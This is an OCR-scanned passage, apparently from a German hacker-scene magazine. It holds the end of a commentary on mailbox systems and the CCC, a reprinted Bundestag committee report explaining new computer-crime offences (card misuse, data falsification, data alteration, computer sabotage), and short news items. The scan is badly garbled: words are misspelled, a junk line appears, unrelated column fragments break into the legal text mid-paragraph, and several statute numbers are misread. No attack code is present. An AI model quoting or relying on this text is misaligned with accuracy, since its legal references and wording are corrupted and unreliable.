qualitativ hochwertigen regionalen Systeme nicht mehr
kostenlos zugänglich seinkonnen, wenn allein die Fern-
meldegebuhrenbis zu 400.- DM pro Monat betragen.
Das ist angesichts der unzähligen C64-Boxen, die zum
Nulltarif am Netz hangen, schon ein schwieriges Un¬
terfangen, das nur durch die erhebliche Leistungsstei¬
gerung gegenüber den herkömmlichen Syslemen sinn¬
voll und damit machbar wird. Nicht zu vergessen, daa
die neuen regionalen und überregionalen Boxen auch
ein gutes Stuck mehr an informationeller Selbstbe¬
stimmung bieten, denn es stecken ja immer noch die¬
selben Leute dahinter, die im besten Sinne chaotischer
Tradition agieren, In diese sehr schwierige Situation
hinein platzt nun die Ankündigung des CCC, seinen
Mitgliedern die Möglichkeit zu geben, ein kommerzielles
Mailbox^stem für einen unglaublich günstigen Preis zu
nutzen. Das ist auf den ersten Blick eine sensationelle
Sache, denn bisher waren kommerzielle Boxen auf¬
grund der hohen Monatsgebuhren für normale Sterb¬
liche unerreichbar. Auf efen zweiten Blick jedoch er¬
geben sich daraus harte Konsequenzen für diejenigen
Sysops, die erade dabei sind, ihre Systeme, wie oben
beschrieben, auszubauen, denn angesichts der neue¬
sten Entwicklung erscheint es zunächst sinnlos, die
Projekte Weiterzufuhren. Wozu ein System errichten,
dass dem Benutzer für fünf Mark im Monat ein Subset
der Leistungen kommerzieller Boxen bietet, wenn für
relativ geringe Mehrkosten der Zugang zu den kom¬
merziellen Systemen offen ist? Zwar ist dafür die Mit¬
gliedschaft im CCC notwendig, was bei den normalen
Boxen nicht der Fall ist, aber es steht zu befurchten, daa
es üblich wird, CCC-Mitglied zu werden, um in den
Genuss der kommerziellen Box zu kommen. Diese
Entwicklung kann .durchaus dazu fuhren, daa die au¬
genblicklichen Versuche, eine autonome Informa¬
tionsszene hohen Standards auzubauen, im Keime
erstickt, oder zumindest auf lange Sicht behindert wer¬
den und es stellt sich die Frage, ob das tatsächlich im
Sinne des Chaos Computer Clubs ist.
cxxl)äi16.di 6S0SQ2 2020 goblin
recht
Zu Aitihel 1 Nr. S — §26eaStGB —
Neben einer redaktionellen Klarstellung bat der
Ausschuß die Überschrift erweitert Dadurch soll
vor allem die unterschiedliche Schutzrichtung zwi¬
schen Abs. 1 und Abs. 2 noch stärker verdeutlicht
werden. Während Absatz 2, wie sich schon aus der
Fassung ergibt ein untreueähnliches Verhalten des
Arbeitgebers (und der ihm durch § 14 StGB gleich¬
gestellten Personen) rum Nachteil des Arbeitneh¬
mers erfassen will handelt es sich bei Absatz 1 (und
ähnlich bei Absatz 3) um den Schutz der Soüdarge-
meinschaft. Das Aufkommen der Sozialversiche-
Tungsträger und der Bundesanstalt für Arbeit soll
dadurch strafrechtlich gewährleistet werden. Dies
ist in Absata l durch die Streichung eingrenzender
Merkmale des geltenden Rechts („erhalten“, „einbe¬
halten“) verdeutlicht worden, wodurch sich Absatz 1
bewußt von Absatz 2 unterscheidet Damit können
künftig auch Falle bestraft werden, in denen Arbeit¬
geber und Arbeitnehmer einveinehmlich verabre¬
den, bei Lohnzahlungen keine Beiträge abzuführen
(zum bisherigen Recht vgl, BGH wistra 1982, 111).
Da sich dies aus dem Wortlaut der Entwürfe bereits
ergibt, ist eine zusätzliche Ergänzung des Teartes,
wie dies von dem Sachverständigen Stahlschmidt
in der öffentlichen Anhörung erwogen vmrde (vgl.
Prot Nf.28. Anl. S. 6). nicht erforderlich. Auch unter
Berücksichtigung der im Wirtschaftsaiisschufi ge¬
äußerten Kritik an § 268 a StGB ist der Ausschuß
der Meinung, daß die Aufbringung der Mittel der
Sozialversicherung ebenso wie die des Steuerauf¬
kommens eines besonderen strafrechtlichen
Schutzes bedarf. Davon geht schon das geltende
Recht aus.
Zu Artikel 1 Nr. 5 — § 26Öb StGB —
Der Rechtsausschuß empfiehlt mit Mehrheit, eine
Strafvorschrift gegen den Mißbrauch von Scheck-
und Kreditkarten einzuführeiL
Dos Scheck- und Kredithartensystero hat inzwi¬
schen zu einer außerordentlichen Ausweitung des
bargeldlosen Zahlungsverkehrs geführt und da¬
durch eine erhebliche volkswirtschaftliche Bedeu¬
tung erlangt Das Scheckkarten ausstellende Kre¬
ditinstitut garantiert hierbei die Einlösung von
Schecks auf speziellen zur Scheckkarte ausgegebe¬
nen Scheckformularen bis zu einem bestimmten
Betrag (zur Zeit 400 DM) und nimmt damit dem
Schecknehmer das Risiko eines ungedeckten
Schecks ab.
Das Kreditkartengeschäft im Drei-Partner-System
beruht auf dem gleichen Grundgedanken. Das Kar¬
ten ausstellende Institut verpflichtet sich gegen¬
über dem Vertragsuntemehmeo, seine Forderun¬
gen gegen dem Karteninhaber auszugleichen. Da¬
bei ist es üblich, dem Vertragsuntemehmen Jeweils
unterschiedliche Obergrenzen für einzelne Ge¬
schäfte zu setzen, bei deren Überschreitung Ver¬
tragsuntemehmen bei Vorlage der Kreditkarte eine
Genehmigung des Kreditkarteninstituts einholen
müssen oder die Einlösungsgarantie verlieren. Da¬
neben ist auch das Zwci-Partner-System gebräuch¬
lich. Hierbei räumt ein Unternehmen mit der Kre¬
ditkartenausgabe seinem Kunden lediglich einen
für alle Filialen gültigen Kundenkredit ein.
Durch die neue Strafvorschrift soll der Fall erfaßt
werden, daß ein Scheck* oder Kreditkartennehmer
unter Verwendung der Karte Waren kauft und
Dienstleistungen in Anspruch nimmt obwohl er
weiß, daß dos Kreditinstitut seine Rechnungen zu
bezahlen hat und er selbst aber, z. B. nach einem
Vermögeosverfall nicht mehr in der Lage sein wird,
die Auslagen zuruckruerstatten. Bestraft werden
soll die dadurch verursachte Vermögensschädigung
der ECreditinstitute.
Der Bundesgerichtshof hat in einem Urteil vom
13. Juni 1985,4 StR 213/85 (BGHSt33.244) zum Kre-
ditkartemnißbrauch festgestellt daß eine solche
Tathandluiig nicht den Tatbestand der Untreue und
des Betrugs erfülle. Allerdings hat der Bundesge¬
richtshof in seiner Entscheidung vom 13. Juni 1985
unter Bestätigung seiner Entscheidung vom 26. Juli
1972 (BGHSt 24, 386) entschieden, daß ein Mi߬
brauch der Scheckkarte durch den Karteoinhal^r
den allgemeinen BetrugstatbesUnd nach §263
StGB erfülle. Er hat hierbei darauf abgestellt, d«Q
die Scheckkarte im Scheckverkehr vorgetegt werde
und nur den zusätzlichen Nachweis der Einlösega-
rantie erbringe, während die eigentliche Handlung
mit Erklärungswert die Hingabe des Schecks sei.
Insoweit bestehe kein wesensmäßtger Unterschied
zu der Einlösung eines ungedeckten Schecks ohne
Scheckkarte. Diese Rechtsprechung des Bundesge¬
richtshofs wird vom Schrifttum bis heute mit der
Begründung heftig kritisiert, daß sie mit den Gege¬
benheiten des Scheckkortenverkehrs nicht im Ein¬
klang sei. Wie bei der Vorlage einer Kreditkarte
brauche der Schecknehmer sich bei der Vorlage der
Scheckkarte bis zur garantierten Summe über die
Kreditwürdigkeit des Scheckausstellers keine Ge¬
danken zu machen und werde das in der Regel auch
nicht tun. Die Voraussetzungen des Betrugstatbe-
Stands, nämlich der für die VermÖgensverfügungen
ursächliche Irrtum, sind deshalb ln dieaen Fällen
nicht gegeben. Angesichte dieser Kritik aus dem
Schrifttum ist davon auszugebeo, daß die Entschei¬
dung des Bundesgerichtshofs auf Dauer schwerlich
Bestand haben werde.
Im Rechtsausschuß ist umstritten, ob der darge¬
stellte Mißbrauch von Scheck- und Kreditkarten
strafwürdig ist Noch Auffassung der Mehrheit
weist die dargestellte Tathaodlung gegenüber dem
geltenden Untreuetatbestand einen ähnlichen so¬
zialschädlichen Kriminalitatsgebalt auf. Der neue
Straftatbestand sei zum Schule der F\mktionsfä-
higkelt des beugeldlosen Zahlungsverkehrs, der
eine volkswirtschaftliche Bedeutung erlangt habe,
notwendig.
Oie Minderheit lehnt die neue Strafvorschrift ab.
Sie ist der Auffassung, daß die Verwendung der
Scheck-, vor ollem der Kreditkarten, allgemein kei¬
neswegs so positiv eiozuschätzea sei. da das Kredit-
und Scheckkartensystem die Gefahr einer Über¬
schuldung der Inhaber io sich berge, wie es sich ln
den USA gezeigt habe. Vor allem würde mit dem
Straftatbestand in systerowidriger Weise die Verlet¬
zung von Vertragspflichtea strafrechtlich sanktio¬
niert und der notwendige Rechtsschutz sei durch
das Zivilrecht gewährleistet Insbesondere sei es
Aufgabe der Kreditinstitute, sich durch eine ent¬
sprechende Ausgestaltung der Rechtsbeziehungen
zu den Inhabern der Scheckkarten und Kreditkar¬
ten und zu den Vertragsfirmen sowie durch eine
sorgfältige Prüfung der Kreditwürdigkeit ihrer
Kunden zu schützen.
Einigkeit bestand im Ausschuß, daß keine Notwen¬
digkeit besteht, den Tatbestand auf andere Fälle
von Mißbräuchen, insbesondere auf den Gebrauch
von Scheck- und Kreditkarten durch Nichtberech¬
tigte auszudehnen. Die Anwendung des Betrugstat¬
bestandes reicht hier aus.
Zu der Ausgestaltung der von der Mehrheit be¬
schlossenen Strafvorschrift ist zu bemerken:
Ahiotz I lehnt sich in seiner Einzelausgestaltung
eng an den Mißbrauchstatbestand des § 266 StGB
(Untreue) an. Durch die Wendung.die ihm durch
die Überlassung einer Scheckkarte oder einer Kre¬
ditkarte eingeräurate Möglichkeit, den Aussteller
zu einer Zahlung zu veranlassen“ wird der Täter¬
kreis auf berechtigte Karteninhaber eingegreiut
und auch die Garantieerklärung, die mit der Über¬
lassung der Karte verbunden ist, beschrieben. Zah¬
lung ist dabei'nicht nur im rem technischen Sinne
eis Hingabe von Bargeld zu verstehen, sondern
auch als Geldleistung im Verrechnungswege. Die
Begriffe Scheck- und Kreditkarte haben im Wirt¬
schaftsleben einen so feststehenden Bedeutungsin¬
halt, daß sie als Tatbestandsmerkmale ausreichend
bestimmt sind, zumal auf die ihnen notwendiger¬
weise zukommende Garantiefunktion Bezug ge¬
nommen wird.
Die mit der Überlassung der Scheck- oder Kredit¬
karte eingeräumte Möglichkeit muß der Täter „mi߬
brauchen“. Das Mißbrauchsmerkmal entspricht
dem des | 266 Abs. 1 1. Alternative StGB. Der Täler
hält sich dabo nach außen im Rahmen seines
rechtlichen KÖruiens, überschreitet aber im Innen¬
verhältnis zu dem Kartenherausgeber die Grenzen
seines rechtlichen Dürfens. Mißbrauch der Scheck¬
karte liegt z. B. Immer dann vor, wenn der Täter
einen Scheck hingibt dessen Einlösung zwar von
Einern Kreditinstitut garantiert ist für den auf sei¬
nem Konto aber keine Deckung oder kein ausrei¬
chender Kredit vorhanden ist Bei der Kreditkarte
liegt ein Mißbrauch z. B. dann vor. wenn der Täter
mit der Verwendung der Karte gegen seine aus dem
Kreditkartenvertrag resultierenden Pflichten ver¬
stößt, iiwbesondere, wenn er Verpflichtungen ein¬
geht obwohl die Einkommens- und Vermbgensver-
hältnisse den KontoausgJeich nicht gestatten oder
er selber nicht für ausreichende Deckung Sorge ge¬
tragen hat
Wie bei § 266 StGB setzt das Mißbrauchsmerkmal
weder generell voraus, daß dem Karteninhaber für
einzelne Geschäfte ein Limit gesetzt ist (so in sei¬
ner Wirkung die Scheckkartengarantie), noch daß
ein zeitabhängiger (etwa monatlicher) Höchstrah¬
men vorgeschrieben wird, noch daß eine absolute
Kreditobergrenze vereinbart ist Anderenfalls wä¬
ren Verhaltensweisen, über die der Bundesgerichts¬
hof jüngst zu entscheiden hatte, weiterhin straflos.
Der Mißbrauch der Kreditkarte muß schließlich zu
einer Schädigung des Kartenherausgebers führen.
Damit soll die Parallele zum Betrugs- und Untxeue-
tatbestand gewahrt v^rden, da durch den neuen
Tatbestand lediglich eine Lücke geschlossen wer¬
den soll, die bei der Anwendung dieser Bestimmun¬
gen offenbar wurde. Es muß sich daher bei dem
Schaden um einen Vermögensschaden bandeln.
Das Schadenserfordemis engt darüber hinaus das
Mißbrauchsmerkmal weiter ein. Ist der Täter an¬
derweitig bereit und in der Lage, die Überziehung
sofort oder jedenfalls unverzüglich auszugleichen,
so liegt ein Schaden ebenso wie beim Untreuetat¬
bestand, der dem neuen Tatbestand in diesem
Punkt entspricht — nicht vor. Unter diesen Voraus¬
setzungen wird auch der neue Tatbestand des
Scbeckkortenmlßbrauchs nicht anzuwenden sein,
wenn der Täter gelegentlich sein Konto durch Be¬
gebung von Schecks über die ihm eingeräumte Kre-
ditgreoze hinaus belastet
Der Täter muß vorsätzlich handeln, der Vorsatz
muß sich auf sämtliche Tatbestandsmerkmale be¬
ziehen. Derjenige, der bei Scheckausstellung oder
Verwendung der Kreditkarte noch nicht weiß, daß
er seinen Verpflichtungen später nicht wird nach-
kommen können, kann daher auch nach dem neuen
Tatbestand nicht bestraft werden. Darüber hinaus
handelt auch derjenige unter Umständen noch
nicht vorsätzlich, der zwar von der Deckungslosig-
keit seines Kontos bei Begebung des garantierten
Schecks weiß, aber mit Vermögensausgleich in kür¬
zester Zeit rechnet
Absatz 2 erklärt entsprechend §266 Abs.2 StGB
§246a (Antragserfordemis bei geringem Schaden)
für entsprechend anwendbar.
Zu Artikel X Nr. 6 — § 269 StGB — Fälschung
beweiserhebiieher Daten
Die Einführung eines besonderen Tatbestandes ge¬
gen die Fälschung beweiserheblicher Daten wird
vom Ausschuß für notwendig erachtet. Dafür sind
die bereits im Regierungsentwurf, in der öffentli¬
chen Anhörung sowie in den Ausschußberatungen
vorgebrachten Gesichtspunkte maßgebend. Vom
Tatbestand der Urkundenfälschung werden unbe¬
fugte Eingaben z. B. von Computerdaten bzw. unbe¬
fugte Veränderungen von bereits gespeicherten Da¬
ten, die, wenn sie in ein Schriftstück aufgenommen
wären, eine Urkundenfälschung darstellen würden,
mangels Erkennbarkeit der Erklärung nicht erfaßt
Für die Anwendung des §287 StGB reicht die
leichte Einsehbarkeit in Dateien über Bildschirm-
terminals alleine nicht aus. Die Urkundeneigen-
schaft kann auch mangels Ausstcllerangabe entfal¬
len. Solchen Daten fehlt daher die von §267 StGB
vorausgesetzte Urkundenqualität. Der Straftatbe¬
stand des §268 StGB (Fälschung technischer Auf¬
zeichnungen) erfaßt nur Teilbereiche. Ohne eine Er¬
gänzung des Strafrechts würde daher die Umstel¬
lung verwaltungsmäßigen Handelns auf die Daten¬
verarbeitung den bisher bei Schriftstücken beste¬
henden strafrechtlichen Urkundenschutz unge¬
rechtfertigt verkürzen. Bei den Verwendungsmög¬
lichkeiten der Datenverarbeitung reicht für einen
wirksamen Schutz axich die Tatsache nicht aus, daß
Verarbeitungen zu- Computerausdrucken führen
können, denen Urkundenqualität beizumessen ist
und die bei (mittelbarer) Vornahme, z. B. von Einga¬
ben oder nachträglichen Veränderungen durch
nicht Berechtigte, deshalb als Urkundenfälschung
i. S. von § 267 StGB qualifiziert werden können. In
vielen Fällen werden entscheidungserhebliche Da¬
ten direkt aus dem Computer zur (maschinellen)
Weiterverarbeitung benut^ wie dies besonders im
Bank-, Rechnungs- und Zahlungsverkehr deutlich
wird.
-f. ,Jtacfce^Manövel‘
^ inParis
oc Eine «NachtderHacksr" isi in der
r vergjngcnen Woche von der Pari-
^ verZeilung'LeMonde'organisiert
i- worden. Zehn luigc Inrormaiifc-
fans.sobenchlei 'Le Monde' jetzt,
«icien unter der Aufsicht von drei
Experten zwischen Mitternacht
und Stehen Uhr am frühen Morgen
tnzwanziggroRe Datenbanken Es-
ropas und der USA eingedrungen
- so in die des britischen Veneidi-
gungiministeriums.
Aus ähnlichen Erwägungen wie beim Computerbe¬
trug hat sich der Ausschuß gegen den Vorschlag
von Haft in der öffentlichen Anhörung (Prot Nr. 26,
S. 164, AnL S. 201) ausgesprochen, sich einer blo¬
ßen Ergänzung des § 267 StGB zu begnügen („Ge-
dankenerkl&nmgen können auch dann Urkunden
sein, wenn sie computerlesbar gespeichert sind“).
Eine sich nxir auf eine Ergänzxmg des Urkunden¬
begriffs. sei es in § 267 StGB oder in allen Urkun¬
denstraftatbeständen, beziehende Gleichstellungs¬
vorschriftwürde andere Tatbestandsmerkmale un¬
angetastet lassen. Dies würde zu einer unklaren
^. inH wenig anschaxilichen Tatbestandsumschrei¬
bung führen (.Wer ... unechte computerlesbar
gespeicherte Gedankenerklärungen ... {bzw. Da¬
ten ...] speichert...), die dem Ausschuß nicht ak¬
zeptabel erscheint
Im Hinblick auf die in Absatz 1 gegenüber den Ent¬
würfen vorgeschlagene Erweiterung des Tatbestan¬
des wurde die Überschrift geändert
Absatz 1 wurde seinem Inhalt und seiner Ausgestal¬
tung nach nicht unwesentlich umgestaltet Entspre¬
chend der PrüfuDgsempfehlung des Bundesrates
stellt die Neufassung sicher, daß die der Herstel¬
lung einer unechten Urkunde entsprechende unzu¬
lässige Speicherung beweiserheblicher Daten dem
Tatbestand unterfäUt Dem dazu vorgelegten For¬
mulierungsvorschlag der Bundesregierung in ihrer
Gegenäu3ei\ing zu der Stellungnahme des Bundes¬
rates ist der Ausschuß allerdings nicht gefolgt Ma߬
gebend dafür war, daß dort zur Abgrenzung von
strafbarem und stzaBosem Verhalten u.a. weiter
auf ^unbefugtes“ Handeln abgestellt wird, dieser
Begi^ jedo^ in seiner Bedeutung nicht völlig klar
ist Darauf hat Haft in der öffentlichen Anhörung zu
Hecht hingewiesen (Prot Nr. 26, Anl. S.210). Die
einengende Auslegung, die der Regierungsentwurf
diesem Merkmal beilegt kann im Hinblick auf eine
weiterreichende Bedeutung dieses Merkmals in an¬
deren Strafvorschriften nicht als gesichert betrach¬
tet werden. Um zu vermeiden, daß von der neuen
Strafvorschrift Verhaltensweisen erfaßt werden, die
bei ihrer Vornahme im Zusammenhang mit der
Herstellung oder Veränderung eines Schriftstücks
niir eine sog. straflose schriftliche Lüge darstellen,
hat der Ausschuß die Vorschrift neu gestaltet Ent¬
scheidend ist daß Daten so (nicht unmittelbar
wahrnehmbar) gespeichert oder verändert werden,
daß sie, %venn sie als ausgedruckt oder wiedergege¬
ben wahrnehmbar wären, eine Urkundenfälschimg
i. S. des § 267 StGB darstellen würden. Mit dieser
‘Ausgestaltung wird auch dem Anliegen von Haft,
den Tatbestand nicht von der Garantiefunktion, der
Aussteuererkennbarkeit zu lösen (Prot Nr. 26,
S. 168, Ani S. 209 f.), Rechnung getragen. Durch die
Konstruktion eines hypothetischen Vergleichs mit
Fällen der Urkundenfälschimg i. S. des § 267 StGB
war es auch nicht mehr notwendig, besonders her¬
vorzuheben, daß vom Tatbestand .cur solche Daten
erfaßt werden, „die dazu bestimmt sind, bei einer
Verarbeitung im Rechtsverkehr als Beweisdaten
für rechtlich erhebliche Tatsachen benutzt zu wer¬
den“ (so die Formulierung der Entwürfe). Der Zu¬
satz „beweiserheblich“ gibt in verkürzter Form
diese Auslegung wieder. Aus der den Tatbestand
des § 267 StGB ergänzenden Funktion des § 269
StGB wie aus seiner Ausgestaltung ergibt sich, daß
nur solche beweiserbeblichen Daten betroffen sind,
die ^elektronisch, magnetisch oder sonst nicht un¬
mittelbar wahrnehmbar“ gespeichert werden bzw.
bei Tatbegehtuig ^hon entsprechend gespeichert
waren. Wie bei § 263 a StGB wurde auf eine Verwei¬
sung auf §202a Abs. 2 StGB abgesehen, da §266
StGB auch Fälle erfaßt, in denen Daten eingegeben
werden, also nicht nur an bereits gespeicherten Da¬
ten Veränderungen vorgenommen werden (so noch
die Entwürfe).
Die Absätze 2 und 3 wurden unverändert übernom¬
men.
§ 270 StGB — Täuschung im Rechtsverkehr bei Da¬
tenverarbeitung —
unverändert
Zu Artikel 1 Nr. 7 und 8 — §§ 271.273 StGB —
unverändert
Zu Artikel 1 Nr. 9 — § 274 StGB —
Die Vorschrift wurde inhaltlich im wesentlichen un¬
verändert übernommen. Die Änderungerr und Er¬
gänzungen sind Folgeändenmgen. Der Begriff Da¬
ten wird durch Bezugnahme auf § 202 a Abs. 2 StGB
io Artikel 1 Nr. 2 b eingegrenzt. Die Verwendung
des Merkmals „beweiserheblich“ ersetzt die Verwei¬
sung auf § 266 StGB. Es ist wie dort zu verstehen
(vgL die Begründung zu Artikel 1 Nr. 6 §269
StGB —). Die Ergänzung der Tathandlungen dient
der Angleichung an § 303 a StGB (Datenverände¬
rung) in Artikel l Nr. 9 b (vgL die dortigen Erläute¬
rungen). Sie verdeutlicht den in der höheren Straf¬
drohung sich auswirkenden Vorrang der Nummer 2
gegenüber §303a StGB. Auch Tathandlungen, die
dem „Beschädigten“ in § 274 Abs. 1 Nr. 1 StGB ent¬
sprechen. werden nunmehr ausdrücklich erfaßt
Zu Artikel 1 Nr.9a und 9b — § 303 Abs.3, §§ 303a,
303 b. 303 c StGB —
§ 303 a StGB — Datenveronderung —
Der Ausschuß schlägt die Aufnahme eines in den
Entwürfen nicht enthaiteneo Tatbestandes gegen
„Datenveränderung“ vor. Als Daten dargestellte In¬
formationen sollen dagegen geschützt werden, daß
ihre Verwendbarkeit beeinträchtigt oder beseitigt
wird. Computerdaten können «inen hohen wirt¬
schaftlichen Wert haben. Auf Grund der wachsen¬
den Abhängigkeit von ihnen in V^rtschaft und Ver¬
waltung und ihrer starken Komprimierung ist ein
zusätzlicher strafrechtlicher Schutz erforderlich.
Aufgegriffen werden damit Aaregungen aus der öf¬
fentlichen Anhörung (vgL Mohr und OerteL Prot
Nr. 26 S. 180, 183t; Anl. S. 38£f„ 218t). Sieber (Prot
S. 177) sah zwar im Moment keine spezifischen Re-
formt^ürfnisse, wies aber selber auf eine mögliche
Zunahme solcher Delikte hin (Prot S. 172). Auch
ausländische Staaten haben vergleichbare Regelun¬
gen (USA, Kanada) oder planen solche (Österreich,
Schweiz). Das geltende Eiecht reicht nicht aus. Die
Anwendbarkeit des § 303 StGB (Sachbeschädigung)
ist umstritten imd zumindest nicht in allen Fallge-
staltungen gesichert (zweifelnd z. R OerteL Prot
S. 183 f„ 160). Das Vernichten oder Veiündem von
Daten während der Übermittlungsphase wird z. B.
von § 303 StGB nicht erfaßt
Der vorgeschlagene Tatbestand lehnt sich in seiner
Ausgestaltung weitgehend an«§ 303 StGB an. Durch
Aufnahme verschiedener, sich teilweise überschnei¬
dender Tathandlungen soll erreicht werden, daß
alle rechtswidrigen Beeinträchtigungen der Ver¬
wendbarkeit von Daten erfaßt werden. Dabei kann
sich die Rechtswidrigkeit sowohl aus der Verlet¬
zung des Verfügungsrechts des Speichernden als
auch aus der Verletzung von Interessen des vom
Inhalt der Daten Betroffenen (vgL §41 BDSG) erge¬
ben.
Absatz 1
Handlungsobjekt sind alle nicht unmittelbar wahr¬
nehmbaren Daten t. S. des § 202 a Abs. 2 StGB. Das
„Löschen“ von Daten, das dem Zerstören einer
Sache in § 303 StGB entspricht, macht diese unwie¬
derbringlich vollständig unkenntlich (vgL § 2 Abs. t
Nr. 4 BDSG). Ein „Unterdrücken“ von Daten liegt
vor, wenn diese dem Zugriff Berechtigter entzogen
und deshalb nicht mehr verwendet werden können;
insoweit geht § 303 a StGB über § 303 StGB hinaus.
„Unbrauchbar“ sind Daten, wenn sie (z. B. durch zu¬
sätzliche Einfügungen, so Sieber in der veröffent¬
lichten erweiterten Fassimg seines Gutachtens) so
in ihrer Gebrauebsfähigkeit beeinträchtigt werden,
daß sie nicht mehr ordnungsgemäß verwendet wer¬
den können und damit ihren Zweck nicht mehr
erfüllen können. Das „Verändern“ von Daten erfaßt
Funktionsbeeinträchtigungen wie das in § 2 Abs. I
Nr. 3 BDSG genannte inhaltliche Umgestalten,
durch das ihr Informationsgehalt bzw. Aussagewert
geändert wird.
Absatz 2
In Parallele zu § 303 StGB wird auch der Versuch
für strafbar erklärt
§ 303 b StGB — Computersabotage —
Der Ausschuß schlägt die Aufnahme eines in den
Entwürfen nicht enthaltenen Tatbestandes gegen
„Computersebotage“ vor. der Störungen der Daten¬
verarbeitung in Wirtschaft txnd Verwaltung durch
Eingriffe in Daten oder Sabotagehandlungen gegen
Datenträger oder Datenverarbeitungshandlungen
dann unter Strafe stellt, wenn die gestörte Daten¬
verarbeitung für den Geschädigten von wesentli¬
cher Bedeutung ist Die zunehmende Bedeutung
und Abhängigkeit von Wirtschaft und Verwaltung
von einem störungsfreien Funktionieren der Daten¬
verarbeitung, insbesondere in Rechenzentren,
rechtfertigt die Einführung eines Tatbestandes ge¬
gen eine besonders gefährliche Form der Wirt¬
schaftssabotage. Werden z. B. Buchführung und
Lohnabrechnung in Rechenzentren lahmgelegt, so
kann dies nicht nur zum wirtschaftlichen Ruin des
Rechenzentrumsbetreibers. sondern auch der mit
diesem zusammenarbeitenden Unternehmen füh¬
ren (Mohr, DATEV, Prot Nr. 26, S. 181). Dabei ist
auch auf die Möglichkeit des unbefugten Eindrin¬
gens Außenstehender hinzuweisen, die u- U. auch zu
erhebtichen Störungen führen kann.
In der öffentlichen Anhörung ist das geltende Recht
(§ 303 StGB) und die in den Entwürfen vorgeschla¬
gene sich auf Beweisdaten beschränkende Ände¬
rung des §274 StGB als unzureichend kritisiert
worden; dies gilt insbesondere für den Strafrahmen
des § 303 StGB (vgL Mohr und OerteL Prot S. 179 ff„
182 ff.; Anl. S. 3eff„ 218 ff.), welchem derjenige des
§ 303 a StGB entspricht (Freiheitsstrafe bis zu zwei
Jahren). Mit diesen Tatbeständen kann den Auswir¬
kungen einer Computersabotage auf Unternehmen
und Behörden (trote § 46 StGB) nicht hinreichend
Rechnung getragen werden- Sieber (Prot S. 177) hat
zwar im Moment kein sperifisches Reformbedürf¬
nis gesehen, aber selber eingeräumt daß bei Stö¬
rungen der Datenübertragung, bei Fehlbedienun-
gen der Computerhardware und sonstigen Eingrif¬
fen in betriebliche Abläufe der Tatbestand der
Sachbeschädigung bei der Erfassung der Betriebs¬
sabotage auf Schwierigkeiten stoßt (Prot AnL
S. 272).
Bei der Entscheidung für einen Sondertatbestand
der Computersabotage hat der Ausschuß die Forde¬
rungen nach einem weitergebenden strafrechtli¬
chen Schutz hochwertiger Wirtschafts- und Indu¬
striegüter vor Sabotage durch einen Straftatbe¬
stand gegen Betriebssabotage nicht übersehen. Ab¬
gesehen von der Schwierigkeit, einen praktikablen
und ausreichend bestimmten Straftatbesland der
Betriebssabotage zu bilden (vgl. auch den Hinweis
von Sieber. Prot Anl. S.273), ist nach Ansicht des
Ausschusses dos derzeitige Bedürfnis für die Bil¬
dung eines Sondertatbestandes der Computersabo-
tage stärker als das für die Einführung eines allge¬
meinen Sabotagetatbestandes.
Angesichte der bei schweren Fällen von Computer¬
sabotage leicht vorstellbaren hohen Schäden hält
der Ausschuß es für notwendig, eine Höchststrafe
von fünf Jahren Freiheitsstrafe vorzusehen.
Im einzelnen ist folgendes zu bemerken:
Absatz 1
Strafbar macht sich, wer eine für einen fremden
Betrieb, ein fremdes Unternehmen oder eine Be¬
hörde wesentliche Datenverarbeitung durch die in
Nummern* 1 und 2 genannten konkreten Angriffs¬
handlungen stört Der Begriff „Datenverarbeitung"
ist dabei weit auszulcgen. Er umfaßt nicht nur den
einzelnen Datenverarbeitungsvorgang, sondern
auch den weiteren Umgang mit Daten und deren
Verwertung. Eingeschränkt wird der Tatbestand
dadurch, daß die Datenverarbeitung „von wesentli¬
cher Bedeutung“ sein muß. Damit sind unter ande¬
rem Angriffe auf Daten (einschließlich ihrer Verar¬
beitung) erfaßt die in den ReAenzentren von Groß-
unternehmen bzw. in Anlagen (einschlieOUch Da*
tehträgem) gespeichert srnd, welche die für die
Firnktionsfähigkeit von Unternehmen bzw. Behör¬
den zentralen Informationen enthalten. Sabotage¬
akte von untergeordneter Bedeutung fallen hier¬
durch bereits von vornherein nicht unter den Tatbe¬
stand; Beeinträchtigungen der Funktionsfähigkeit
von elektronischen Schreibmaschinen oder Ta¬
schenrechnern werden dadurch ausgeschieden. Für
die Anwendung des Tatbestandes ist eine bloße Ge¬
fährdung der Datenverarbeitung nicht ausreichend;
vorliegen muß vielmehr eine nicht unerhebliche Be¬
einträchtigung des reibungslosen Ablaufs der ge¬
nannten wesentlichen Datenverarbeitung. Eine Stö¬
rung des Betriebes wie in § 316 b StGB wird jedoch
nicht gefordert; eine ^ starke Einengung des Tat¬
bestandes soll dadurch vermieden werden. Nicht
strafbar macht sich nach §303b StGB derjenige,
welcher durch Handlungen nach Nummern 1 oder 2
nur seine eigene Datenverarbeitung stört Greift er
hierbei in fremde Rechte ein, kann er insoweit nach
§ 303 bzw. 303 a StGB bestraft werden.
Hinsichtlich der einzelnen Angriffsmittel unter¬
scheidet Absatz 1 zwischen verschiedenen Tatob-
jektec.
Nummer J nennt als Sabotagehandlung eine rechta-
widrige Datenveränderung i. S. von § 303 a Abs. 1
StGB. Eine Tat nach Absatz 1 Nr. L stellt insoweit
eine Qualifikation zu § 303 a StGB dar.
^ 303 .41)5. 3; ^ 303 c StGB — Strafantag_
Wie der bisherige § 303 StGB werden die §§ 303 a
und 303 b StGB grundsätzlich als Antragsdelikt
ausgestaltet. Ausnahmsweise kann in Fällen beson¬
deren öffentlichen Interesses ein Strafverfahren
auch ohne Strafantrag durchgeführt werden. Die
Identität der Regelung für die §§ 303 bis 303 b StGB
hat den Ausschuß bewogen, diese im Anschluß
daran in einen neuen § 303 c StGB aufzunehmen
(vgl. als Parallele § 205 StGB). Die Aufhebung des
§ 303 Abs. 3 StGB stellt dazu eine Folgeanderung
Kurzmeldungen
(Bild: Harald, aus taz]
Atom-Kataster
Ein störsichares StrahlungsmeBprogramm
auf Heimcomputern wie VC20 und C64 fahren
mehrere Bürgerinitiativen. Derzeit werden erst
ein paar der bundesdeutschen Atomkraft¬
werke überwacht.
Nummer 2 knüpft bei der Nennung weiterer an Da¬
tenverarbeitungsanlagen oder Datenträgern began¬
genen Sabotagehandlungen am Tatbestand der
Sachbeschädigung (§303 StGB) und an Sabotage¬
straftatbestände des Strafgesetzbuches an (§ 87
Abs. 2 Nr. 2; § 100 e Abs. 1: § 145 Abs. 2 Nr. 2; §§ 316 b,
317), womit auch eine Angleichung an N umm er 1
i. V. m. den in § 303 a StGB genannten Tathandlun¬
gen erfolgt Die Begriffe „Zerstören“ und „Beschädi¬
